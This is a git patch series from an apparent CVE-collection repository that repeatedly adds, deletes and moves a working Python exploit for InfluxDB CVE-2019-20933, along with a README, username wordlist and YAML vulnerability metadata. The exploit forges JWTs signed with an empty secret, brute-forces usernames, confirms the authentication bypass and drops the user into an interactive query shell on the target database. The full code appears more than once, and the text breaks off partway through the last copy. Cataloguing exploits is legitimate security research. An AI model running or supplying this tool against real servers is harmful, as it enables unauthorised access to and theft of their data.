From 49e030e9256dc58b63d61a617330929ea920cfb1 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Tue, 14 Mar 2023 06:27:25 +0000 Subject: [PATCH 01/40] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2019-20933?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/confluence/2019/CVE-2019-20933/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/confluence/2019/CVE-2019-20933/.keep diff --git a/cve/confluence/2019/CVE-2019-20933/.keep b/cve/confluence/2019/CVE-2019-20933/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From aa70c98f2891d377d26280ce82b1fe622213cefd Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Tue, 14 Mar 2023 06:27:47 +0000 Subject: [PATCH 02/40] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/confluence/2019/CVE-2019-20933/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/confluence/2019/CVE-2019-20933/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/confluence/2019/CVE-2019-20933/.keep diff --git a/cve/confluence/2019/CVE-2019-20933/.keep b/cve/confluence/2019/CVE-2019-20933/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 0f266e638fd376b9ce292fb2001835eb06174f04 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Tue, 14 Mar 2023 06:28:04 +0000 Subject: [PATCH 03/40] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2019-20933?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/confluence/2019/CVE-2019-20933/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/confluence/2019/CVE-2019-20933/.keep diff --git a/cve/confluence/2019/CVE-2019-20933/.keep b/cve/confluence/2019/CVE-2019-20933/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From f8ab71fefa73e555cdaba5fd3b18d9a783ec14a6 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Tue, 14 Mar 2023 06:28:21 +0000 Subject: [PATCH 04/40] CVE-2019-20933 Signed-off-by: Zentung0628 --- cve/confluence/2019/CVE-2019-20933/README.md | 16 ++ .../2019/CVE-2019-20933/__main__.py | 185 ++++++++++++++++++ .../2019/CVE-2019-20933/requirements.txt | 4 + cve/confluence/2019/CVE-2019-20933/users.txt | 7 + 4 files changed, 212 insertions(+) create mode 100644 cve/confluence/2019/CVE-2019-20933/README.md create mode 100644 cve/confluence/2019/CVE-2019-20933/__main__.py create mode 100644 cve/confluence/2019/CVE-2019-20933/requirements.txt create mode 100644 cve/confluence/2019/CVE-2019-20933/users.txt diff --git a/cve/confluence/2019/CVE-2019-20933/README.md b/cve/confluence/2019/CVE-2019-20933/README.md new file mode 100644 index 00000000..dad0665f --- /dev/null +++ b/cve/confluence/2019/CVE-2019-20933/README.md @@ -0,0 +1,16 @@ +# InfluxDB Exploit CVE-2019-20933 + +Exploit for InfluxDB CVE-2019-20933 vulnerability, InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). +Exploit check if server is vulnerable, then it tries to get a remote query shell. It has built in a username bruteforce service. + +## Installation +``` +git clone https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933.git +cd InfluxDB-Exploit-CVE-2019-20933 +pip install -r requirements.txt +``` + +## Usage +``` +python __main__.py +``` diff --git a/cve/confluence/2019/CVE-2019-20933/__main__.py b/cve/confluence/2019/CVE-2019-20933/__main__.py new file mode 100644 index 00000000..e38d12f4 --- /dev/null +++ b/cve/confluence/2019/CVE-2019-20933/__main__.py @@ -0,0 +1,185 @@ +#!/bin/env python + +import json +import pathlib +import time +import urllib +import requests as requests +import jwt +from termcolor import colored + +def bruteforceUser(filename, host, port): + print() + print("Bruteforcing usernames ...") + with open(filename) as f: + for line in f: + line = line.replace("\n", "") + exp = int(time.time()) + exp = exp + 2.628 * 10 ** 6 + # Generation JWT + payload = { + "username": line, + "exp": exp + } + + token = jwt.encode(payload, "", algorithm="HS256") + query = "SHOW DATABASES" + response = makeQuery(token, 'dummy', host, port, query) + response = json.loads(response) + if "error" in response.keys(): + if "signature is invalid" in response['error']: + print(colored("ERROR: Host not vulnerable !!!", "red")) + print(colored("ERROR: " + response['error'] + "", "red")) + exit(1) + if "user not found" in response['error']: + print("[{}] {}".format(colored("x", "red"), line)) + else: + print("[{}] {}".format(colored("v", "green"), line)) + print() + username = line + return username + + print(colored("ERROR: no valid username found !!!", "red")) + exit(1) + +def makeQuery(token, db, host, port, query): + try: + headers = { + 'Authorization': 'Bearer ' + token, + } + except: + token = token.decode("utf-8") + headers = { + 'Authorization': 'Bearer ' + token, + } + + # Send request + query = urllib.parse.quote_plus(query) + response = requests.get('http://' + host + ':' + str(port) + '/query?db=' + db + '&q=' + query, headers=headers) + return response.text + +def exploit(): + # imput data + print() + try: + host = input("Host (default: localhost): ") + except KeyboardInterrupt: + return + + if host == "": + host = "127.0.0.1" + + try: + port = input("Port (default: 8086): ") + except KeyboardInterrupt: + return + if port == "": + port = 8086 + + try: + username = input("Username path to username file (default: users.txt): ") + except KeyboardInterrupt: + return + + if username == "": + username = "users.txt" + + # check if username is a valid file to start bruteforce + file = pathlib.Path(username) + if file.exists(): + username = bruteforceUser(username, host, port) + + exp = int(time.time()) + exp = exp + 2.628 * 10 ** 6 # Aggiungo un mese + + # Generation JWT + payload = { + "username": username, + "exp": exp + } + + token = jwt.encode(payload, "", algorithm="HS256") + #print("Token: {}".format(token)) + query = "SHOW DATABASES" + response = makeQuery(token, 'dummy', host, port, query) + response = json.loads(response) + + if "results" in response.keys(): + print(colored("Host vulnerable !!!", "green")) + else: + print(colored("ERROR: Host not vulnerable !!!", "red")) + print(colored("ERROR: "+response['error']+"", "red")) + return + + # Get databases list + dblist = [db[0] for db in response['results'][0]['series'][0]['values']] + + while True: + print() + print("Databases:") + print() + for (i, db) in enumerate(dblist): + print("{}) {}".format(i + 1, db)) + + print() + print(".quit to exit") + + + try: + db = input("[{}@{}] Database: ".format(colored(username, "red"), colored(host, "yellow"))) + except KeyboardInterrupt: + print() + print("~ Bye!") + break + + try: + db = dblist[int(db) - 1] + except IndexError as e: + # Prompt again if database index if not in range + continue + except Exception as e: + # Check if database exists if its a string + if db.strip() == "": + continue + if db not in dblist: + print(colored("[Error] ", "red") + "No such database: \"" + colored(db, "yellow") + "\"") + continue + pass + + if db in ['.exit', '.quit', '.back']: + return + if db == "": + continue + + print() + print("Starting InfluxDB shell - .back to go back") + while True: + try: + query = input("[{}@{}/{}] $ ".format(colored(username, "red"), colored(host, "yellow"), colored(db, "blue"))) + except KeyboardInterrupt: + break + + if query.strip() == "": + continue + + if query in ['.exit', '.quit', '.back']: + break + + response = makeQuery(token, db, host, port, query) + response = json.loads(response) + print(json.dumps(response, indent=4, sort_keys=True)) + + +if __name__ == '__main__': + print(colored(""" + _____ __ _ _____ ____ ______ _ _ _ + |_ _| / _| | | __ \| _ \ | ____| | | (_) | + | | _ __ | |_| |_ ___ __ | | | |_) | | |__ __ ___ __ | | ___ _| |_ + | | | '_ \| _| | | | \ \/ / | | | _ < | __| \ \/ / '_ \| |/ _ \| | __| + _| |_| | | | | | | |_| |> <| |__| | |_) | | |____ > <| |_) | | (_) | | |_ + |_____|_| |_|_| |_|\__,_/_/\_\_____/|____/ |______/_/\_\ .__/|_|\___/|_|\__| + | | + |_| """, 'green')) + print(colored(" - using CVE-2019-20933", "yellow")) + + exploit() diff --git a/cve/confluence/2019/CVE-2019-20933/requirements.txt b/cve/confluence/2019/CVE-2019-20933/requirements.txt new file mode 100644 index 00000000..a345330c --- /dev/null +++ b/cve/confluence/2019/CVE-2019-20933/requirements.txt @@ -0,0 +1,4 @@ +urllib3 +requests +PyJWT +termcolor diff --git a/cve/confluence/2019/CVE-2019-20933/users.txt b/cve/confluence/2019/CVE-2019-20933/users.txt new file mode 100644 index 00000000..802b77da --- /dev/null +++ b/cve/confluence/2019/CVE-2019-20933/users.txt @@ -0,0 +1,7 @@ +admin +user +root +database +db +influx +influxdb -- Gitee From a6a64a806d71f4f34d1079e9a20733e0be0f2039 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Tue, 14 Mar 2023 06:28:26 +0000 Subject: [PATCH 05/40] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/confluence/2019/CVE-2019-20933/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/confluence/2019/CVE-2019-20933/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/confluence/2019/CVE-2019-20933/.keep diff --git a/cve/confluence/2019/CVE-2019-20933/.keep b/cve/confluence/2019/CVE-2019-20933/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 1ec1aea543521673805b0771b5544fae119745e5 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Tue, 14 Mar 2023 07:05:33 +0000 Subject: [PATCH 06/40] CVE-2019-20933 yaml Signed-off-by: Zentung0628 --- cve/confluence/2019/yaml/CVE-2019-20933.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 cve/confluence/2019/yaml/CVE-2019-20933.yaml diff --git a/cve/confluence/2019/yaml/CVE-2019-20933.yaml b/cve/confluence/2019/yaml/CVE-2019-20933.yaml new file mode 100644 index 00000000..ec29dcb4 --- /dev/null +++ b/cve/confluence/2019/yaml/CVE-2019-20933.yaml @@ -0,0 +1,19 @@ +id: 2019-20933 +source: +info: + name: InfluxDB是一个开源的分布式时序数据库,主要用于存储和查询时间序列数据 + severity: critical + description: | + 利用 InfluxDB CVE-2019-20933 漏洞,InfluxDB 1.7.6 之前的 services/httpd/handler.go 中的 authenticate 函数存在身份验证绕过漏洞,因为 JWT token 可能有一个空的 SharedSecret(又名共享秘密)。 利用检查服务器是否易受攻击,然后它会尝试获取远程查询 shell。 它内置了用户名暴力破解服务。 + scope-of-influence: +InfluxDB 1.7.0至1.7.9和2.0.0-alpha至2.0.0-alpha.5版本 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-20933 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9 + cve-id: CVE-2019-20933 + cwe-id: CWE-78 + cnvd-id: CNVD-2020-03627 + kve-id: KVE-2019-1372 + tags: RCE,cve2019,任意文件读取 \ No newline at end of file -- Gitee From 878472f8ec702eff271cae4d928f5d47ff684c59 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Tue, 14 Mar 2023 09:47:37 +0000 Subject: [PATCH 07/40] update cve/confluence/2019/yaml/CVE-2019-20933.yaml. Signed-off-by: Zentung0628 --- cve/confluence/2019/yaml/CVE-2019-20933.yaml | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) diff --git a/cve/confluence/2019/yaml/CVE-2019-20933.yaml b/cve/confluence/2019/yaml/CVE-2019-20933.yaml index ec29dcb4..05fc64d4 100644 --- a/cve/confluence/2019/yaml/CVE-2019-20933.yaml +++ b/cve/confluence/2019/yaml/CVE-2019-20933.yaml @@ -1,19 +1,20 @@ id: 2019-20933 -source: +source: https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933 info: - name: InfluxDB是一个开源的分布式时序数据库,主要用于存储和查询时间序列数据 + name: InfluxDB 1.7.6之前版本中的services/httpd/handler.go中的authenticate函数存在认证绕过漏洞。该漏洞源于JWT令牌可能具有空SharedSecret。攻击者可利用该漏洞绕过认证。 severity: critical description: | - 利用 InfluxDB CVE-2019-20933 漏洞,InfluxDB 1.7.6 之前的 services/httpd/handler.go 中的 authenticate 函数存在身份验证绕过漏洞,因为 JWT token 可能有一个空的 SharedSecret(又名共享秘密)。 利用检查服务器是否易受攻击,然后它会尝试获取远程查询 shell。 它内置了用户名暴力破解服务。 + InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). scope-of-influence: InfluxDB 1.7.0至1.7.9和2.0.0-alpha至2.0.0-alpha.5版本 reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-20933 + classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9 + cvss-score: 9.8 cve-id: CVE-2019-20933 - cwe-id: CWE-78 - cnvd-id: CNVD-2020-03627 - kve-id: KVE-2019-1372 - tags: RCE,cve2019,任意文件读取 \ No newline at end of file + cwe-id: CWE-287 + cnvd-id: CNVD-2022-06547 + kve-id: None + tags: RCE, cve2019, 任意文件读取 \ No newline at end of file -- Gitee From b690fd16ce478188438386d8827d8b269b973f92 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Tue, 14 Mar 2023 11:47:08 +0000 Subject: [PATCH 08/40] update cve/confluence/2019/yaml/CVE-2019-20933.yaml. Signed-off-by: Zentung0628 --- cve/confluence/2019/yaml/CVE-2019-20933.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/confluence/2019/yaml/CVE-2019-20933.yaml b/cve/confluence/2019/yaml/CVE-2019-20933.yaml index 05fc64d4..172c737e 100644 --- a/cve/confluence/2019/yaml/CVE-2019-20933.yaml +++ b/cve/confluence/2019/yaml/CVE-2019-20933.yaml @@ -1,4 +1,4 @@ -id: 2019-20933 +id: CVE-2019-20933 source: https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933 info: name: InfluxDB 1.7.6之前版本中的services/httpd/handler.go中的authenticate函数存在认证绕过漏洞。该漏洞源于JWT令牌可能具有空SharedSecret。攻击者可利用该漏洞绕过认证。 -- Gitee From ff1835804e2568f7f11ba5306dad454cff733536 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 02:32:07 +0000 Subject: [PATCH 09/40] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20InfluxDB?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/InfluxDB/.keep diff --git a/cve/InfluxDB/.keep b/cve/InfluxDB/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 57dccce9d7739c63ad623bd19846ef6fbd6cfbfc Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 02:36:06 +0000 Subject: [PATCH 10/40] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/confluence/2019/CVE-2019-20933?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/confluence/2019/CVE-2019-20933/README.md | 16 -- .../2019/CVE-2019-20933/__main__.py | 185 ------------------ .../2019/CVE-2019-20933/requirements.txt | 4 - cve/confluence/2019/CVE-2019-20933/users.txt | 7 - 4 files changed, 212 deletions(-) delete mode 100644 cve/confluence/2019/CVE-2019-20933/README.md delete mode 100644 cve/confluence/2019/CVE-2019-20933/__main__.py delete mode 100644 cve/confluence/2019/CVE-2019-20933/requirements.txt delete mode 100644 cve/confluence/2019/CVE-2019-20933/users.txt diff --git a/cve/confluence/2019/CVE-2019-20933/README.md b/cve/confluence/2019/CVE-2019-20933/README.md deleted file mode 100644 index dad0665f..00000000 --- a/cve/confluence/2019/CVE-2019-20933/README.md +++ /dev/null @@ -1,16 +0,0 @@ -# InfluxDB Exploit CVE-2019-20933 - -Exploit for InfluxDB CVE-2019-20933 vulnerability, InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). -Exploit check if server is vulnerable, then it tries to get a remote query shell. It has built in a username bruteforce service. - -## Installation -``` -git clone https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933.git -cd InfluxDB-Exploit-CVE-2019-20933 -pip install -r requirements.txt -``` - -## Usage -``` -python __main__.py -``` diff --git a/cve/confluence/2019/CVE-2019-20933/__main__.py b/cve/confluence/2019/CVE-2019-20933/__main__.py deleted file mode 100644 index e38d12f4..00000000 --- a/cve/confluence/2019/CVE-2019-20933/__main__.py +++ /dev/null @@ -1,185 +0,0 @@ -#!/bin/env python - -import json -import pathlib -import time -import urllib -import requests as requests -import jwt -from termcolor import colored - -def bruteforceUser(filename, host, port): - print() - print("Bruteforcing usernames ...") - with open(filename) as f: - for line in f: - line = line.replace("\n", "") - exp = int(time.time()) - exp = exp + 2.628 * 10 ** 6 - # Generation JWT - payload = { - "username": line, - "exp": exp - } - - token = jwt.encode(payload, "", algorithm="HS256") - query = "SHOW DATABASES" - response = makeQuery(token, 'dummy', host, port, query) - response = json.loads(response) - if "error" in response.keys(): - if "signature is invalid" in response['error']: - print(colored("ERROR: Host not vulnerable !!!", "red")) - print(colored("ERROR: " + response['error'] + "", "red")) - exit(1) - if "user not found" in response['error']: - print("[{}] {}".format(colored("x", "red"), line)) - else: - print("[{}] {}".format(colored("v", "green"), line)) - print() - username = line - return username - - print(colored("ERROR: no valid username found !!!", "red")) - exit(1) - -def makeQuery(token, db, host, port, query): - try: - headers = { - 'Authorization': 'Bearer ' + token, - } - except: - token = token.decode("utf-8") - headers = { - 'Authorization': 'Bearer ' + token, - } - - # Send request - query = urllib.parse.quote_plus(query) - response = requests.get('http://' + host + ':' + str(port) + '/query?db=' + db + '&q=' + query, headers=headers) - return response.text - -def exploit(): - # imput data - print() - try: - host = input("Host (default: localhost): ") - except KeyboardInterrupt: - return - - if host == "": - host = "127.0.0.1" - - try: - port = input("Port (default: 8086): ") - except KeyboardInterrupt: - return - if port == "": - port = 8086 - - try: - username = input("Username path to username file (default: users.txt): ") - except KeyboardInterrupt: - return - - if username == "": - username = "users.txt" - - # check if username is a valid file to start bruteforce - file = pathlib.Path(username) - if file.exists(): - username = bruteforceUser(username, host, port) - - exp = int(time.time()) - exp = exp + 2.628 * 10 ** 6 # Aggiungo un mese - - # Generation JWT - payload = { - "username": username, - "exp": exp - } - - token = jwt.encode(payload, "", algorithm="HS256") - #print("Token: {}".format(token)) - query = "SHOW DATABASES" - response = makeQuery(token, 'dummy', host, port, query) - response = json.loads(response) - - if "results" in response.keys(): - print(colored("Host vulnerable !!!", "green")) - else: - print(colored("ERROR: Host not vulnerable !!!", "red")) - print(colored("ERROR: "+response['error']+"", "red")) - return - - # Get databases list - dblist = [db[0] for db in response['results'][0]['series'][0]['values']] - - while True: - print() - print("Databases:") - print() - for (i, db) in enumerate(dblist): - print("{}) {}".format(i + 1, db)) - - print() - print(".quit to exit") - - - try: - db = input("[{}@{}] Database: ".format(colored(username, "red"), colored(host, "yellow"))) - except KeyboardInterrupt: - print() - print("~ Bye!") - break - - try: - db = dblist[int(db) - 1] - except IndexError as e: - # Prompt again if database index if not in range - continue - except Exception as e: - # Check if database exists if its a string - if db.strip() == "": - continue - if db not in dblist: - print(colored("[Error] ", "red") + "No such database: \"" + colored(db, "yellow") + "\"") - continue - pass - - if db in ['.exit', '.quit', '.back']: - return - if db == "": - continue - - print() - print("Starting InfluxDB shell - .back to go back") - while True: - try: - query = input("[{}@{}/{}] $ ".format(colored(username, "red"), colored(host, "yellow"), colored(db, "blue"))) - except KeyboardInterrupt: - break - - if query.strip() == "": - continue - - if query in ['.exit', '.quit', '.back']: - break - - response = makeQuery(token, db, host, port, query) - response = json.loads(response) - print(json.dumps(response, indent=4, sort_keys=True)) - - -if __name__ == '__main__': - print(colored(""" - _____ __ _ _____ ____ ______ _ _ _ - |_ _| / _| | | __ \| _ \ | ____| | | (_) | - | | _ __ | |_| |_ ___ __ | | | |_) | | |__ __ ___ __ | | ___ _| |_ - | | | '_ \| _| | | | \ \/ / | | | _ < | __| \ \/ / '_ \| |/ _ \| | __| - _| |_| | | | | | | |_| |> <| |__| | |_) | | |____ > <| |_) | | (_) | | |_ - |_____|_| |_|_| |_|\__,_/_/\_\_____/|____/ |______/_/\_\ .__/|_|\___/|_|\__| - | | - |_| """, 'green')) - print(colored(" - using CVE-2019-20933", "yellow")) - - exploit() diff --git a/cve/confluence/2019/CVE-2019-20933/requirements.txt b/cve/confluence/2019/CVE-2019-20933/requirements.txt deleted file mode 100644 index a345330c..00000000 --- a/cve/confluence/2019/CVE-2019-20933/requirements.txt +++ /dev/null @@ -1,4 +0,0 @@ -urllib3 -requests -PyJWT -termcolor diff --git a/cve/confluence/2019/CVE-2019-20933/users.txt b/cve/confluence/2019/CVE-2019-20933/users.txt deleted file mode 100644 index 802b77da..00000000 --- a/cve/confluence/2019/CVE-2019-20933/users.txt +++ /dev/null @@ -1,7 +0,0 @@ -admin -user -root -database -db -influx -influxdb -- Gitee From ad9a309aa6f29ff6eefebdf5000bbda6089dbd5f Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 02:36:15 +0000 Subject: [PATCH 11/40] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/confluence/2019/yaml/CVE-2019-20933.yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/confluence/2019/yaml/CVE-2019-20933.yaml | 20 -------------------- 1 file changed, 20 deletions(-) delete mode 100644 cve/confluence/2019/yaml/CVE-2019-20933.yaml diff --git a/cve/confluence/2019/yaml/CVE-2019-20933.yaml b/cve/confluence/2019/yaml/CVE-2019-20933.yaml deleted file mode 100644 index 172c737e..00000000 --- a/cve/confluence/2019/yaml/CVE-2019-20933.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: CVE-2019-20933 -source: https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933 -info: - name: InfluxDB 1.7.6之前版本中的services/httpd/handler.go中的authenticate函数存在认证绕过漏洞。该漏洞源于JWT令牌可能具有空SharedSecret。攻击者可利用该漏洞绕过认证。 - severity: critical - description: | - InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). - scope-of-influence: -InfluxDB 1.7.0至1.7.9和2.0.0-alpha至2.0.0-alpha.5版本 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-20933 - - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2019-20933 - cwe-id: CWE-287 - cnvd-id: CNVD-2022-06547 - kve-id: None - tags: RCE, cve2019, 任意文件读取 \ No newline at end of file -- Gitee From 3e54029d3295734bc1586d243e1fea927fc59b68 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 02:36:30 +0000 Subject: [PATCH 12/40] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/InfluxDB/yaml/.keep diff --git a/cve/InfluxDB/yaml/.keep b/cve/InfluxDB/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 9b67d43bf0cf4592624b9ac27c14a2008198703b Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 02:36:46 +0000 Subject: [PATCH 13/40] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2019-20933?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/CVE-2019-20933/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/InfluxDB/CVE-2019-20933/.keep diff --git a/cve/InfluxDB/CVE-2019-20933/.keep b/cve/InfluxDB/CVE-2019-20933/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 84491d258440a36fca14cffe1b0c54734e3e5f92 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 02:36:56 +0000 Subject: [PATCH 14/40] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/InfluxDB/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/InfluxDB/.keep diff --git a/cve/InfluxDB/.keep b/cve/InfluxDB/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 8c226b539cdf5e836d72dfdd0cb9e007608ecb00 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 02:37:36 +0000 Subject: [PATCH 15/40] add CVE-2019-20933 Signed-off-by: Zentung0628 --- cve/InfluxDB/CVE-2019-20933/README.md | 16 ++ cve/InfluxDB/CVE-2019-20933/__main__.py | 185 +++++++++++++++++++ cve/InfluxDB/CVE-2019-20933/requirements.txt | 4 + cve/InfluxDB/CVE-2019-20933/users.txt | 7 + 4 files changed, 212 insertions(+) create mode 100644 cve/InfluxDB/CVE-2019-20933/README.md create mode 100644 cve/InfluxDB/CVE-2019-20933/__main__.py create mode 100644 cve/InfluxDB/CVE-2019-20933/requirements.txt create mode 100644 cve/InfluxDB/CVE-2019-20933/users.txt diff --git a/cve/InfluxDB/CVE-2019-20933/README.md b/cve/InfluxDB/CVE-2019-20933/README.md new file mode 100644 index 00000000..dad0665f --- /dev/null +++ b/cve/InfluxDB/CVE-2019-20933/README.md @@ -0,0 +1,16 @@ +# InfluxDB Exploit CVE-2019-20933 + +Exploit for InfluxDB CVE-2019-20933 vulnerability, InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). +Exploit check if server is vulnerable, then it tries to get a remote query shell. It has built in a username bruteforce service. + +## Installation +``` +git clone https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933.git +cd InfluxDB-Exploit-CVE-2019-20933 +pip install -r requirements.txt +``` + +## Usage +``` +python __main__.py +``` diff --git a/cve/InfluxDB/CVE-2019-20933/__main__.py b/cve/InfluxDB/CVE-2019-20933/__main__.py new file mode 100644 index 00000000..e38d12f4 --- /dev/null +++ b/cve/InfluxDB/CVE-2019-20933/__main__.py @@ -0,0 +1,185 @@ +#!/bin/env python + +import json +import pathlib +import time +import urllib +import requests as requests +import jwt +from termcolor import colored + +def bruteforceUser(filename, host, port): + print() + print("Bruteforcing usernames ...") + with open(filename) as f: + for line in f: + line = line.replace("\n", "") + exp = int(time.time()) + exp = exp + 2.628 * 10 ** 6 + # Generation JWT + payload = { + "username": line, + "exp": exp + } + + token = jwt.encode(payload, "", algorithm="HS256") + query = "SHOW DATABASES" + response = makeQuery(token, 'dummy', host, port, query) + response = json.loads(response) + if "error" in response.keys(): + if "signature is invalid" in response['error']: + print(colored("ERROR: Host not vulnerable !!!", "red")) + print(colored("ERROR: " + response['error'] + "", "red")) + exit(1) + if "user not found" in response['error']: + print("[{}] {}".format(colored("x", "red"), line)) + else: + print("[{}] {}".format(colored("v", "green"), line)) + print() + username = line + return username + + print(colored("ERROR: no valid username found !!!", "red")) + exit(1) + +def makeQuery(token, db, host, port, query): + try: + headers = { + 'Authorization': 'Bearer ' + token, + } + except: + token = token.decode("utf-8") + headers = { + 'Authorization': 'Bearer ' + token, + } + + # Send request + query = urllib.parse.quote_plus(query) + response = requests.get('http://' + host + ':' + str(port) + '/query?db=' + db + '&q=' + query, headers=headers) + return response.text + +def exploit(): + # imput data + print() + try: + host = input("Host (default: localhost): ") + except KeyboardInterrupt: + return + + if host == "": + host = "127.0.0.1" + + try: + port = input("Port (default: 8086): ") + except KeyboardInterrupt: + return + if port == "": + port = 8086 + + try: + username = input("Username path to username file (default: users.txt): ") + except KeyboardInterrupt: + return + + if username == "": + username = "users.txt" + + # check if username is a valid file to start bruteforce + file = pathlib.Path(username) + if file.exists(): + username = bruteforceUser(username, host, port) + + exp = int(time.time()) + exp = exp + 2.628 * 10 ** 6 # Aggiungo un mese + + # Generation JWT + payload = { + "username": username, + "exp": exp + } + + token = jwt.encode(payload, "", algorithm="HS256") + #print("Token: {}".format(token)) + query = "SHOW DATABASES" + response = makeQuery(token, 'dummy', host, port, query) + response = json.loads(response) + + if "results" in response.keys(): + print(colored("Host vulnerable !!!", "green")) + else: + print(colored("ERROR: Host not vulnerable !!!", "red")) + print(colored("ERROR: "+response['error']+"", "red")) + return + + # Get databases list + dblist = [db[0] for db in response['results'][0]['series'][0]['values']] + + while True: + print() + print("Databases:") + print() + for (i, db) in enumerate(dblist): + print("{}) {}".format(i + 1, db)) + + print() + print(".quit to exit") + + + try: + db = input("[{}@{}] Database: ".format(colored(username, "red"), colored(host, "yellow"))) + except KeyboardInterrupt: + print() + print("~ Bye!") + break + + try: + db = dblist[int(db) - 1] + except IndexError as e: + # Prompt again if database index if not in range + continue + except Exception as e: + # Check if database exists if its a string + if db.strip() == "": + continue + if db not in dblist: + print(colored("[Error] ", "red") + "No such database: \"" + colored(db, "yellow") + "\"") + continue + pass + + if db in ['.exit', '.quit', '.back']: + return + if db == "": + continue + + print() + print("Starting InfluxDB shell - .back to go back") + while True: + 